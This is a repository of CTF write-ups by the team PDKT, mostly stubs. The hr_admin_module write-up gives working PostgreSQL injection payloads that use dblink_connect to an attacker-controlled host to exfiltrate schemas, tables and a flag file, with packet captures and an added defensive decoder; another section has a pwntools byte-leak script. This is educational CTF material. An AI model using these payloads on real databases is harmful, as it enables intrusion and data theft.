-------------------------------- /LICENSE: --------------------------------

MIT License

Copyright (c) 2018 PDKT

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

-------------------------------- /README.md: --------------------------------

# CTF Write-Ups by PDKT

Write-ups for various CTF challenges by [PDKT team](https://ctftime.org/team/16919), in English and Indonesian.

## 2019

* [**Facebook CTF 2019**](fbctf2019)

## 2018

* [**Hack.lu CTF 2018**](hacklu2018)
* [**HITCON CTF 2018 Online Quals**](hitcon2018)
* [**SECCON CTF 2018 Online Quals**](seccon2018)

-------------------------------- /fbctf2019/README.md: --------------------------------

# Facebook CTF 2019

https://ctftime.org/event/781

## Web
- [products manager (100)](products-manager)
- [pdfme (655)](pdfme)
- [secret note keeper (676)](secret-note-keeper)
- [rceservice (919)](rceservice)
- [events (957)](events)
- [hr_admin_module (1000)](hr-admin-module)

-------------------------------- /fbctf2019/events/README.md: --------------------------------

# events
---
**Points:** 957 | **Solves:** 23/1734 | **Category:** Web

I heard cookies and string formatting are safe in 2019?

http://challenges.fbctf.com:8083

(This problem does not require any brute force or scanning. We will ban your team if we detect brute force or scanning).

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
TODO


## Bahasa Indonesia
TODO

-------------------------------- /fbctf2019/hr-admin-module/README.md: --------------------------------

# hr_admin_module
---
**Points:** 1000 | **Solves:** 4/1734 | **Category:** Web

While tying down the application the developer may have had trouble revoking the permission on one or two functions. Let's hope this got sorted. At least he made sure the site feels really fast.

http://challenges.fbctf.com:8081

![](screenshot.png)

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
*Solved after the CTF ended.*

### Summary
- We can trigger PostgreSQL injection through the hidden `user_search` parameter.
- Query execution happens in the background or asynchronously (probably with `dblink`), so the website only displays a warning message when the query contains a syntax or semantic error.
- We can't perform in-band SQL injection or inferential (blind) SQL injection because everything runs in the background; the only thing we learn is whether the syntax and semantics are correct.
- Out-of-band SQL injection is possible by using SQL SSRF via `dblink_connect` to open a connection to our remote server, so the query result can be read from a DNS request or a raw network dump (`(SELECT dblink_connect('host=HOST user=' || (QUERY) || ' password=PASSWORD dbname=DBNAME'))`).
- The current PostgreSQL user is allowed to use `lo_import` to load a file into the `pg_largeobject` catalog, but has no permission to `SELECT` from `pg_largeobject` or to call `lo_get` on the new object's `oid`.
- We can list all `oid`s through `pg_largeobject_metadata` and then try `lo_get` on old `oid`s to see whether the secret/flag file has been loaded before and the current user is allowed to read it.
- The flag file was loaded in the past with `oid` 16444, so we can get its content with `lo_get(16444)`!

### Detailed Steps

This website has a simple dashboard with a feature to search employees (`?employee_search=`). From the error message we learn that there is a file named `secret` in `/var/lib/postgresql/data/`; we can assume that this file is the flag and that the website uses PostgreSQL. There is also a feature to search users, but it seems to be disabled on the front-end. We can still reach it by sending its parameter directly, and the page source shows that the parameter name is `user_search`.

![](user-search.png)

Using this feature produces nothing: no results, nothing on the page. However, if the search value contains a single quote and we refresh the page again, the website displays a warning message. It seems to use session-based warning messages and delays to defeat automatic scanners.

![](warning.png)

Closing the value with an SQL comment does not produce a warning. Again, we might need to refresh the page.

![](no-warning.png)

We can try a number of PostgreSQL queries to find out which ones generate a warning message and which do not. To be sure, we can refresh the page several times for each query.

- `asd' and 1=0 --`, no warning
- `asd' and 1=1 --`, no warning
- `asd' order by 1 --`, no warning
- `asd' order by 2 --`, no warning
- `asd' order by 3 --`, warning
- `asd' union select 1,2 --`, warning
- `asd' union select 1,'a' --`, no warning
- `asd' union select 1,pg_sleep(10) --`, warning
- `asd' union select 1,cast(pg_sleep(10) as text) --`, no warning (without any delay)
- `asd' union select 1,'a' from pg_database --`, no warning
- `asd' union select 1,'a' from farisv --`, warning
- `asd' union select 1,chr(65) --`, no warning
- `asd' union select 1,chr(-65) --`, no warning

From the observed behaviour, we can assume that the warning message only appears when there is a syntax or semantic error in the query. Because `pg_sleep` does not cause any delay either, we can safely assume that query execution happens in the background or asynchronously. In that case, common SQL injection techniques such as in-band SQL injection or inferential/blind SQL injection are not usable.

A quick search for running PostgreSQL queries asynchronously points to `dblink` (https://www.postgresql.org/docs/11/dblink.html). It is a module that supports connections to other PostgreSQL databases (or to the same database) from within a database session. It provides `dblink_send_query` to send a query to be executed asynchronously. The module is not enabled by default, but it may well be enabled here.

We can see that a query containing `dblink_connect` does not cause a warning, so `dblink` may be enabled.

![](dblink-connect.png)

Normally, `dblink_connect` is used to open a persistent connection to a remote PostgreSQL database (e.g. `SELECT dblink_connect('host=HOST user=USER password=PASSWORD dbname=DBNAME')`). Because we control the parameter of this function, we can perform SQL server-side request forgery to our own host. That means we can perform out-of-band SQL injection to exfiltrate data from SQL query results. There are at least two ways to do this:

1. Set up a DNS server and then trigger a connection to `[data].our.domain`, so that the data shows up in the log or in the DNS network packets.
2. Set up a public PostgreSQL server, monitor the incoming network packets on the PostgreSQL port, and then trigger a connection to our host with the exfiltrated data as `user`/`dbname`. By default, PostgreSQL does not use SSL for the connection, so `user`/`dbname` are visible as plaintext on the network.

The second method is easier because we don't need a domain. We only need a server with a public IP, install PostgreSQL, make the PostgreSQL service listen on \*/0.0.0.0, and run a network dumper (e.g. tcpdump) to monitor traffic to the PostgreSQL port (5432 by default).

To make PostgreSQL listen publicly, set `listen_addresses` in `postgresql.conf` to `*`.

```
listen_addresses = '*'
```

To monitor incoming traffic, run `tcpdump` on port 5432.

```
sudo tcpdump -nX -i eth0 port 5432
```

To check whether we get a connection from the target, we can try this query:

```
asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=farisv password=postgres dbname=hellofromfb')) --
```

If it works, we get a network packet with a readable `user` and `dbname`.

```
17:14:11.267060 IP [54.185.163.254.50968] > [REDACTED]: Flags [P.], seq 1:43, ack 1, win 229, options [nop,nop,TS val 970078525 ecr 958693110], length 42
0x0000: 4500 005e 9417 4000 2706 248c 36b9 a3fe E..^..@.'.$.6...
0x0010: 9de6 2259 c718 2061 5889 142a 9f8a cb5d .."Y...aX..*...]
0x0020: 8018 00e5 1701 0000 0101 080a 39d2 393d ............9.9=
0x0030: 3924 7ef6 0000 002a 0003 0000 7573 6572 9$~....*....user
0x0040: 0066 6172 6973 7600 6461 7461 6261 7365 .farisv.database
0x0050: 0068 656c 6c6f 6672 6f6d 6662 0000 .hellofromfb.
```

Then we can go on extracting the database with several PostgreSQL queries. Note that whenever a query result contains whitespace, we need to convert the result to hex/base64 with the `encode` function, or replace the whitespace with another character using `replace`, because whitespace causes an execution error inside `dblink_connect`.

Get a list of schemas:

```
asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(schema_name,':') FROM information_schema.schemata) || ' password=postgres dbname=postgres')) --
```

```
17:36:46.538178 IP 54.185.163.254.51018 > [REDACTED]: Flags [P.], seq 1:70, ack 1, win 229, options [nop,nop,TS val 971433789 ecr 960048322], length 69
0x0000: 4500 0079 ecd5 4000 2706 cbb2 36b9 a3fe E..y..@.'...6...
0x0010: 9de6 2259 c74a 2061 1e74 4769 b404 803d .."Y.J.a.tGi...=
0x0020: 8018 00e5 2710 0000 0101 080a 39e6 e73d ....'.......9..=
0x0030: 3939 2cc2 0000 0045 0003 0000 7573 6572 99,....E....user
0x0040: 0070 7562 6c69 633a 696e 666f 726d 6174 .public:informat
0x0050: 696f 6e5f 7363 6865 6d61 3a70 675f 6361 ion_schema:pg_ca
0x0060: 7461 6c6f 6700 6461 7461 6261 7365 0070 talog.database.p
0x0070: 6f73 7467 7265 7300 00 ostgres.
```

Get a list of tables in the current schema:

```
asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(tablename, ':') FROM pg_catalog.pg_tables WHERE schemaname=current_schema()) || ' password=postgres dbname=postgres')) --
```

```
17:38:30.515438 IP 54.185.163.254.51026 > [REDACTED]: Flags [P.], seq 1:42, ack 1, win 229, options [nop,nop,TS val 971537775 ecr 960152304], length 41
0x0000: 4500 005d f371 4000 2706 c532 36b9 a3fe E..].q@.'..26...
0x0010: 9de6 2259 c752 2061 8dd4 e226 24a3 a5c5 .."Y.R.a...&$...
0x0020: 8018 00e5 fe2b 0000 0101 080a 39e8 7d6f .....+......9.}o
0x0030: 393a c2f0 0000 0029 0003 0000 7573 6572 9:.....)....user
0x0040: 0073 6561 7263 6865 7300 6461 7461 6261 .searches.databa
0x0050: 7365 0070 6f73 7467 7265 7300 00 se.postgres.
```

Count the rows in the `searches` table:

```
asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT COUNT(*) FROM searches) || ' password=postgres dbname=postgres')) --
```

```
17:42:39.511643 IP 54.185.163.254.51034 > [REDACTED]: Flags [P.], seq 1:35, ack 1, win 229, options [nop,nop,TS val 971786760 ecr 960401280], length 34
0x0000: 4500 0056 7982 4000 2706 3f29 36b9 a3fe E..Vy.@.'.?)6...
0x0010: 9de6 2259 c75a 2061 5ec0 7df0 8611 357d .."Y.Z.a^.}...5}
0x0020: 8018 00e5 f855 0000 0101 080a 39ec 4a08 .....U......9.J.
0x0030: 393e 8f80 0000 0022 0003 0000 7573 6572 9>....."....user
0x0040: 0030 0064 6174 6162 6173 6500 706f 7374 .0.database.post
0x0050: 6772 6573 0000 gres.
```

It looks like there is only one empty table in the current schema, and the flag is not in the database. We really do need to exfiltrate `/var/lib/postgresql/data/secret`. Unfortunately, if we try `pg_read_file` or `pg_read_binary_file` to read the file, no incoming connection arrives, so the current user probably has no permission to use these functions.

The alternative for reading files is large objects (https://www.postgresql.org/docs/11/lo-funcs.html). We can use `lo_import` to load the contents of the file into the `pg_largeobject` catalog. If the query succeeds, we get the object's `oid`.

```
asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT lo_import('/var/lib/postgresql/data/secret')) || ' password=postgres dbname=postgres')) --
```

```
17:54:51.963925 IP 54.185.163.254.51046 > [REDACTED]: Flags [P.], seq 1:39, ack 1, win 229, options [nop,nop,TS val 972519214 ecr 961133706], length 38
0x0000: 4500 005a 071f 4000 2706 b188 36b9 a3fe E..Z..@.'...6...
0x0010: 9de6 2259 c766 2061 26fb c8a7 bbb3 fe01 .."Y.f.a&.......
0x0020: 8018 00e5 2272 0000 0101 080a 39f7 772e ...."r......9.w.
0x0030: 3949 bc8a 0000 0026 0003 0000 7573 6572 9I.....&....user
0x0040: 0032 3436 3638 0064 6174 6162 6173 6500 .24668.database.
0x0050: 706f 7374 6772 6573 0000 postgres..
```

We got 24668 as the `oid`, which means we are allowed to use `lo_import`. Unfortunately, we get no result when we try to read the large object's content with `lo_get(24668)` or by accessing the `pg_largeobject` catalog directly. It looks like the current user has no permission to read the content of new objects.

Reading the large object documentation, we find that large objects can have an ACL (Access Control List). That means that if there is an old object whose ACL allows the current user to read it, we can exfiltrate that object's content.

We can get the list of existing large object `oid`s from `pg_largeobject_metadata`.

```
asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(cast(l.oid as text), ':') FROM pg_largeobject_metadata l) || ' password=postgres dbname=postgres')) --
```

```
18:06:57.172285 IP 54.185.163.254.51052 > [REDACTED]: Flags [.], seq 1:2897, ack 1, win 229, options [nop,nop,TS val 973244413 ecr 961858878], length 2896
0x0000: 4500 0b84 7adf 4000 2606 339e 36b9 a3fe E...z.@.&.3.6...
0x0010: 9de6 2259 c76c 2061 8d76 e934 10c9 3972 .."Y.l.a.v.4..9r
0x0020: 8010 00e5 a66d 0000 0101 080a 3a02 87fd .....m......:...
0x0030: 3954 cd3e 0000 1c94 0003 0000 7573 6572 9T.>........user
0x0040: 0031 3635 3731 3a31 3634 3339 3a31 3635 .16571:16439:165
0x0050: 3732 3a31 3634 3431 3a31 3634 3432 3a31 72:16441:16442:1
0x0060: 3733 3732 3a31 3634 3434 3a31 3634 3435 7372:16444:16445
0x0070: 3a31 3831 3534 3a31 3733 3830 3a31 3737 :18154:17380:177
0x0080: 3038 3a31 3635 3737 3a31 3634 3530 3a31 08:16577:16450:1
0x0090: 3634 3531 3a31 3634 3532 3a31 3634 3533 6451:16452:16453

.....
.....
.....
```

We got a bunch of `oid`s. We can try `lo_get` to load an object's content; for example, `lo_get(16439)` loads the content of `/etc/passwd`. Because the result of `lo_get` is `bytea`, we need to convert it to `UTF8` so that it can be concatenated into the query.

We can try loading the objects with the lowest `oid`s to find out whether the flag file has been loaded before. The flag file object does exist, with `oid` 16444. There is no whitespace in the flag, so we can send it as is.

To load the flag:

```
asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT convert_from(lo_get(16444), 'UTF8')) || ' password=postgres dbname=postgres')) --
```

```
18:13:01.953251 IP 54.185.163.254.51058 > [REDACTED]: Flags [P.], seq 1:65, ack 1, win 229, options [nop,nop,TS val 973609199 ecr 962223650], length 64
0x0000: 4500 0074 bc7d 4000 2706 fc0f 36b9 a3fe E..t.}@.'...6...
0x0010: 9de6 2259 c772 2061 0b27 4451 16b1 7f33 .."Y.r.a.'DQ...3
0x0020: 8018 00e5 92bb 0000 0101 080a 3a08 18ef ............:...
0x0030: 395a 5e22 0000 0040 0003 0000 7573 6572 9Z^"...@....user
0x0040: 0066 627b 4040 646e 735f 3378 6669 6c5f .fb{@@dns_3xfil_
0x0050: 6630 725f 7468 655f 7731 6e21 2140 407d f0r_the_w1n!!@@}
0x0060: 0064 6174 6162 6173 6500 706f 7374 6772 .database.postgr
0x0070: 6573 0000 es..
```

Flag: **fb{@@dns_3xfil_f0r_the_w1n!!@@}**

A nice challenge to learn out-of-band SQL injection and PostgreSQL! Because the flag mentions `dns`, exfiltrating the data through the PostgreSQL network connection is perhaps not the intended solution.
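What the receiving side actually sees, as an added example (not code from the write-up or the repository): the payload in each tcpdump capture above is a PostgreSQL v3 StartupMessage, so anyone monitoring outbound connections from a database host can decode the `user`/`database` parameters and flag values that do not look like credentials. The capture text is copied from the first dump above; the frame-layout assumptions (IPv4, TCP data offset read from the header), the identifier regex and all function names are mine.

```python
"""Decode PostgreSQL StartupMessages from tcpdump -X output and flag parameter
values that look like smuggled query results rather than credentials."""
import re
import struct

# First capture shown in the write-up (hex words plus the ASCII column, as printed).
CAPTURE = """\
0x0000: 4500 005e 9417 4000 2706 248c 36b9 a3fe E..^..@.'.$.6...
0x0010: 9de6 2259 c718 2061 5889 142a 9f8a cb5d .."Y...aX..*...]
0x0020: 8018 00e5 1701 0000 0101 080a 39d2 393d ............9.9=
0x0030: 3924 7ef6 0000 002a 0003 0000 7573 6572 9$~....*....user
0x0040: 0066 6172 6973 7600 6461 7461 6261 7365 .farisv.database
0x0050: 0068 656c 6c6f 6672 6f6d 6662 0000 .hellofromfb.
"""

PG_PROTOCOL_3 = 0x00030000                       # int32 "3.0" at the start of every StartupMessage
HEX_WORD = re.compile(r"^[0-9a-f]{2}(?:[0-9a-f]{2})?$")
# Assumed shape of an ordinary role/database name; anything else in user/database is suspect.
PLAIN_IDENT = re.compile(r"^[A-Za-z0-9_.\-]{1,63}$")


def hexdump_to_bytes(dump: str) -> bytes:
    """Rebuild the raw frame from tcpdump -X text: at most eight 16-bit hex words per
    line, stopping at the first token that is not hex (that is where the ASCII column starts)."""
    raw = bytearray()
    for line in dump.splitlines():
        _, _, rest = line.partition(":")        # drop the "0x0030:" offset
        for tok in rest.split()[:8]:
            if not HEX_WORD.match(tok):
                break
            raw += bytes.fromhex(tok)
    return bytes(raw)


def tcp_payload(frame: bytes) -> bytes:
    """Strip the IPv4 header (IHL field) and the TCP header (data offset field)."""
    ihl = (frame[0] & 0x0F) * 4
    doff = (frame[ihl + 12] >> 4) * 4
    return frame[ihl + doff:]


def build_startup(params: dict) -> bytes:
    """Encode a StartupMessage: int32 self-inclusive length, int32 version,
    then key\\0value\\0 pairs and a final \\0 terminator."""
    body = b"".join(k.encode() + b"\x00" + v.encode() + b"\x00" for k, v in params.items())
    body += b"\x00"
    return struct.pack("!II", 8 + len(body), PG_PROTOCOL_3) + body


def parse_startup(payload: bytes) -> dict:
    """Decode a StartupMessage into its parameter dict, rejecting malformed input."""
    if len(payload) < 9:
        raise ValueError("payload too short for a StartupMessage")
    length, version = struct.unpack("!II", payload[:8])
    if length != len(payload):
        raise ValueError(f"length field {length} does not match {len(payload)} bytes")
    if version != PG_PROTOCOL_3:
        raise ValueError(f"unexpected protocol/request code {version:#010x}")
    body = payload[8:]
    if not body.endswith(b"\x00\x00"):
        raise ValueError("parameter list is not NUL-terminated")
    fields = body[:-2].split(b"\x00")
    if len(fields) % 2:
        raise ValueError("odd number of key/value fields")
    return {fields[i].decode("utf-8", "replace"): fields[i + 1].decode("utf-8", "replace")
            for i in range(0, len(fields), 2)}


def suspicious_params(params: dict) -> list:
    """Names of connection parameters whose values do not look like plain identifiers."""
    return [k for k, v in params.items() if k in ("user", "database") and not PLAIN_IDENT.match(v)]


def inspect_capture(dump: str) -> dict:
    """tcpdump text -> decoded startup parameters plus the ones worth a closer look."""
    params = parse_startup(tcp_payload(hexdump_to_bytes(dump)))
    return {"params": params, "suspicious": suspicious_params(params)}


if __name__ == "__main__":
    print(inspect_capture(CAPTURE))
    # Constructed from the last capture above: a flag in `user` trips the identifier check.
    print(suspicious_params({"user": "fb{@@dns_3xfil_f0r_the_w1n!!@@}", "database": "postgres"}))
```

A purely numeric result such as the row count `0` above passes the identifier check, so this is a triage aid, not a control; what actually stops this exfiltration is blocking outbound 5432 and DNS from the database host and not granting `dblink` to application roles.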

## Bahasa Indonesia
TODO

-------------------------------- /fbctf2019/hr-admin-module/dblink-connect.png: --------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/fbctf2019/hr-admin-module/dblink-connect.png

-------------------------------- /fbctf2019/hr-admin-module/no-warning.png: --------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/fbctf2019/hr-admin-module/no-warning.png

-------------------------------- /fbctf2019/hr-admin-module/screenshot.png: --------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/fbctf2019/hr-admin-module/screenshot.png

-------------------------------- /fbctf2019/hr-admin-module/user-search.png: --------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/fbctf2019/hr-admin-module/user-search.png

-------------------------------- /fbctf2019/hr-admin-module/warning.png: --------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/fbctf2019/hr-admin-module/warning.png

-------------------------------- /fbctf2019/pdfme/README.md: --------------------------------

# pdfme
---
**Points:** 655 | **Solves:** 63/1734 | **Category:** Web

We set up this PDF conversion service for public use, hopefully it's safe.

http://challenges.fbctf.com:8084

(This problem does not require any brute force or scanning. We will ban your team if we detect brute force or scanning).

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
TODO


## Bahasa Indonesia
TODO

-------------------------------- /fbctf2019/products-manager/README.md: --------------------------------

# products manager
---
**Points:** 655 | **Solves:** 431/1734 | **Category:** Web

Come play with our products manager application!

http://challenges.fbctf.com:8087

Written by Vampire

(This problem does not require any brute force or scanning. We will ban your team if we detect brute force or scanning).

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
TODO


## Bahasa Indonesia
TODO

-------------------------------- /fbctf2019/rceservice/README.md: --------------------------------

# rceservice
---
**Points:** 919 | **Solves:** 31/1734 | **Category:** Web

We created this web interface to run commands on our servers, but since we haven't figured out how to secure it yet we only let you run 'ls'

http://challenges.fbctf.com:8085

(This problem does not require any brute force or scanning. We will ban your team if we detect brute force or scanning).

[Download](rceservice.tar.gz)

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
TODO


## Bahasa Indonesia
TODO

-------------------------------- /fbctf2019/rceservice/rceservice.tar.gz: --------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/fbctf2019/rceservice/rceservice.tar.gz

-------------------------------- /fbctf2019/secret-note-keeper/README.md: --------------------------------

# secret note keeper
---
**Points:** 676 | **Solves:** 61/1734 | **Category:** Web

Find the secret note that contains the fl4g!

http://challenges.fbctf.com:8082

Same thing but in Tokyo: http://challenges3.fbctf.com:8082/

(Timeout is 5 seconds for links, flag is case insensitive)

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
TODO


## Bahasa Indonesia
TODO

-------------------------------- /hacklu2018/1-bit-missile/1_bit_missile_2869d5c89c974929b5b585b0586345ff.zip: --------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hacklu2018/1-bit-missile/1_bit_missile_2869d5c89c974929b5b585b0586345ff.zip

-------------------------------- /hacklu2018/1-bit-missile/README.md: --------------------------------

# 1-bit-missile
---
**Points:** 271 | **Solves:** 39/1035 | **Category:** Reverse

The laser cannon is aiming in the wrong direction.

Maybe a precise shot can calibrate it.

`nc arcade.fluxfingers.net 1816`

[Download](1_bit_missile_2869d5c89c974929b5b585b0586345ff.zip)

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
The binary provided is a dumped ROM that can be run with `qemu`.

```
qemu-system-i386 -bios rom -serial stdio
```

In the binary there is also a flag string at offset 143075.

```
$ strings -a -t d rom | grep flag
143075 flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
148568 %s%s resource base %llx size %llx align %d gran %d limit %llx flags %lx index %lx
152945 Code: %d eflags: %08x cr2: %08x
```

The service at `arcade.fluxfingers.net:1816` runs a similar program with a different flag. We can set one bit of the ROM to 0 at any offset. Before changing the bit, the service also displays the byte at the selected offset.

```
Enter target byte [0 - 262143]: 140000
]> 01001101 <[
Enter target bit: [0 - 7]: 0
}X> ---------------------------------------{0}
]> 01001100 <[


coreboot-4.8-1707-g33cd6d5-dirty Sun Oct 14 23:58:10 UTC 2018 ramstage starting...
...
Jumping to boot code at 00100000(00fd7000)
FLAG if hit confirmed:
MISSED!
```

By using the byte leak, we can leak the flag string at offset 143075 one byte per connection.

The following is the script used.

```python
from pwn import *

now = ''
flag_offset = 143075  # offset of the flag string found with `strings -t d`
flag = ''

# Each connection prints one byte (as 8 binary digits) before asking for the bit,
# so reconnect once per character until the closing brace of the flag is reached.
while now != '}':
    r = remote('arcade.fluxfingers.net', 1816)
    r.recvuntil(b': ')                  # "Enter target byte [0 - 262143]: "
    r.sendline(str(flag_offset).encode())
    leak = r.recvline()[3:-4]           # "]> 01001101 <[\n" -> b"01001101"
    r.close()
    now = chr(int(leak, 2))
    flag += now
    flag_offset += 1

print(flag)
```

Flag: **flag{only_cb_can_run_this_simple_elf}**


## Bahasa Indonesia
The binary provided is a ROM dump that can be run with `qemu`.
80 | 81 | ``` 82 | qemu-system-i386 -bios rom -serial stdio 83 | ``` 84 | 85 | Pada binary juga terdapat flag pada offset 143075 86 | 87 | ``` 88 | $ strings -a -t d rom | grep flag 89 | 143075 flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} 90 | 148568 %s%s resource base %llx size %llx align %d gran %d limit %llx flags %lx index %lx 91 | 152945 Code: %d eflags: %08x cr2: %08x 92 | ``` 93 | 94 | Layanan pada `arcade.fluxfingers.net:1816` menjalankan program yang sepertinya flagnya sudah diubah. Kita dapat mengubah 1 bit dari ROM menjadi 0 pada offset manapun. Sebelum diubah, layanan juga menampilkan byte pada offset yang dipilih. 95 | 96 | ``` 97 | Enter target byte [0 - 262143]: 140000 98 | ]> 01001101 <[ 99 | Enter target bit: [0 - 7]: 0 100 | }X> ---------------------------------------{0} 101 | ]> 01001100 <[ 102 | 103 | 104 | coreboot-4.8-1707-g33cd6d5-dirty Sun Oct 14 23:58:10 UTC 2018 ramstage starting... 105 | ... 106 | Jumping to boot code at 00100000(00fd7000) 107 | FLAG if hit confirmed: 108 | MISSED! 109 | ``` 110 | 111 | Dengan memanfaatkan leak pada bytes, kita dapat melakukan leak pada string flag yang ada di offset 143075. 112 | 113 | Berikut adalah script yang digunakan. 
114 | 115 | ```python 116 | 117 | from pwn import * 118 | 119 | now = '' 120 | flag_offset = 143075 121 | flag = '' 122 | 123 | while (now != '}'): 124 | r = remote('arcade.fluxfingers.net', 1816) 125 | r.recvuntil(': ') 126 | r.sendline(str(flag_offset)) 127 | leak = r.recvline()[3:-4] 128 | now = chr(int(leak, 2)) 129 | flag += now 130 | flag_offset += 1 131 | 132 | print flag 133 | ``` 134 | 135 | Flag: **flag{only_cb_can_run_this_simple_elf}** 136 | -------------------------------------------------------------------------------- /hacklu2018/README.md: -------------------------------------------------------------------------------- 1 | # Hack.lu CTF 2018 2 | 3 | https://ctftime.org/event/699 4 | 5 | ## Crypto 6 | - [Relations (205)](relations) 7 | 8 | ## Pwn 9 | - [Baby Exploit (186)](baby-exploit) 10 | - [Baby Kernel (189)](baby-kernel) 11 | - [Heap Heaven 2 (246)](heap-heaven-2) 12 | 13 | ## Reverse 14 | - [1-bit-missile (271)](1-bit-missile) 15 | - [Baby Reverse (108)](baby-reverse) 16 | - [Cheat Console (329)](cheat-console) 17 | - [Forgetful Commander (281)](forgetful-commander) 18 | 19 | ## Web 20 | - [Baby PHP (153)](baby-php) 21 | -------------------------------------------------------------------------------- /hacklu2018/baby-exploit/README.md: -------------------------------------------------------------------------------- 1 | # Baby Exploit 2 | --- 3 | **Points:** 186 | **Solves:** 97/1035 | **Category:** Pwn 4 | 5 | This Challenge is the continuation of babyreversing. If you just reversed the file, go ahead and exploit it now! The zip file will contain all information to this challenge. 6 | 7 | The password is the flag of babyreversing. 
8 | 9 | `nc arcade.fluxfingers.net 1807` 10 | 11 | [Download](babyexploit_fbc7b89e5c7e3c72992a6a4d214c970b.zip) 12 | --- 13 | 14 | [Bahasa Indonesia](#bahasa-indonesia) 15 | 16 | ## English 17 | TODO 18 | 19 | 20 | ## Bahasa Indonesia 21 | TODO 22 | -------------------------------------------------------------------------------- /hacklu2018/baby-exploit/babyexploit_fbc7b89e5c7e3c72992a6a4d214c970b.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hacklu2018/baby-exploit/babyexploit_fbc7b89e5c7e3c72992a6a4d214c970b.zip -------------------------------------------------------------------------------- /hacklu2018/baby-kernel/README.md: -------------------------------------------------------------------------------- 1 | # Baby Kernel 2 | --- 3 | **Points:** 189 | **Solves:** 93/1035 | **Category:** Pwn 4 | 5 | If you are like most of us and kernel addresses scare you in a way this may be the time to get in contact for the first time. 6 | 7 | They are not as scary after all. Enjoy! 

`nc arcade.fluxfingers.net 1817`

[Download](baby_kernel_3460960b6fc99f8a90fba7397b5e4c46.zip)
---

[Bahasa Indonesia](#bahasa-indonesia)

## English
TODO


## Bahasa Indonesia
TODO
--------------------------------------------------------------------------------
/hacklu2018/baby-kernel/baby_kernel_3460960b6fc99f8a90fba7397b5e4c46.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hacklu2018/baby-kernel/baby_kernel_3460960b6fc99f8a90fba7397b5e4c46.zip
--------------------------------------------------------------------------------
/hacklu2018/baby-php/README.md:
--------------------------------------------------------------------------------
# Baby PHP
---
**Points:** 153 | **Solves:** 147/1035 | **Category:** Web

PHP is a popular general-purpose scripting language that is especially suited to web development.

Fast, flexible and pragmatic, PHP powers everything from your blog to the most popular websites in the world.

[Can you untangle this mess?!](https://arcade.fluxfingers.net:1819/)
---

[Bahasa Indonesia](#bahasa-indonesia)

## English
Given the following PHP code (each of its checks is quoted again in the sections below):

```php
$hack){
        $$lel = $hack;
    }
}

$ b = "2";$a=" b";//;1=b

if($$a !== $k1){
    die("lel no\n");
}

// plz die now
assert_options(ASSERT_BAIL, 1);
assert("$bb == $cc");

echo "Good Job ;)";
// TODO
// echo $flag;
```

There are several traps in this problem. First, `preg_match('/^\d+＄/', $k2)` does not use the ASCII dollar sign `$` but `＄`, the Unicode [full width dollar sign](http://graphemica.com/%EF%BC%84) (U+FF04), so the pattern has no end anchor and the `＄` has to appear literally in the input.
Second, when the source is displayed through `highlight_file(__FILE__);` (as it is in the challenge), one line looks like this:

![](trap.png)

The real code is `$ b = "2";$a=" b";//;1=b`: the variable name (`$ b`) and the assignment (`$a=" b"`) contain the Unicode character U+202E, the [right-to-left override](https://www.charbase.com/202e-unicode-right-to-left-override), so the rest of the line is displayed reversed. The `b` is preceded by that invisible character, not by a space.

Our goal is to reach `echo "Good Job ;)";`. The commented-out `// echo $flag;` indicates that a variable named `$flag` exists, but it is never written to the output. We can use `assert("$bb == $cc");` to get arbitrary code execution if we can control `$bb` or `$cc`, because `assert` with a string argument [evaluates that string like `eval`](http://php.net/manual/en/function.assert.php) (PHP 7 behaviour; string arguments to `assert()` are no longer evaluated in PHP 8).

